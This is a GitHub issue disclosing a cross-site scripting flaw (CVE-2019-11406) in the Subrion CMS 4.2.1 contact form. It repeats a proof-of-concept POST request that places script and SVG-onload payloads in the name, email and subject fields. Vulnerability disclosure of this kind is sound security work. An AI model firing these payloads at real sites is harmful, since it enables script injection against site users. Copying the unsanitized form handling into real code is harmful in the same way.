Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Title: [Subrion CMS- 4.2.1 XSS] Date: [12-04-2019] [Vulnerability Type] Cross Site Scripting (XSS) Version: [4.2.1] Tested on:
Cross Site Scripting (XSS)
[Windows,FireFox]
[Affected Product Code Base] Subrion CMS - 4.2.1 [Affected Component] parameter: name. parameter: email. parameter: phone. In contact page PoC: POST /_core/en/contacts/ HTTP/1.1 Host: demos.subrion.org Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2 Upgrade-Insecure-Requests: 1 __st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
Subrion CMS - 4.2.1
parameter: name. parameter: email. parameter: phone. In contact page
POST /_core/en/contacts/ HTTP/1.1 Host: demos.subrion.org Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2 Upgrade-Insecure-Requests: 1 __st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
K
[Impact Code execution] true [Attack Vectors] POST /_core/en/contacts/ HTTP/1.1 Host: demos.subrion.org Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2 __st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
[Impact Code execution] true
[Attack Vectors] POST /_core/en/contacts/ HTTP/1.1 Host: demos.subrion.org Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
Author: [Mohammed Alorf - twitter:@_oww] CVE-2019-11406.
The text was updated successfully, but these errors were encountered:
can anyone please review this bug? this is a quite critical vulnerability.
Sorry, something went wrong.
No branches or pull requests
[Windows,FireFox]
The text was updated successfully, but these errors were encountered: